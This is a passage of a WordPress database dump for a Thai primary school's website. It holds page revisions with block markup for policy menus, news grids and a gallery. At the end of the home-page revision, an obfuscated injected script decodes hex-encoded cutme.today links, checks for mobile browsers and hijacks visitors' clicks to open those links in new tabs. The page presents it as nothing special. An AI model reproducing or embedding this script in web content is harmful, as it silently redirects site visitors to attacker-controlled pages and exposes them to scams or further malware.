300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:09:53','2024-07-27 05:09:53','',14,'http://pakhaeng.ssk.in.th/?p=136',0,'revision','',0),
(138,1,'2024-07-27 12:12:43','2024-07-27 05:12:43','','สุนทนภู่','','inherit','','closed','','%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%99%e0%b8%a0%e0%b8%b9%e0%b9%88','','','2024-07-27 12:12:43','2024-07-27 05:12:43','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4',0,'attachment','video/mp4',0),
(139,1,'2024-07-27 12:13:20','2024-07-27 05:13:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.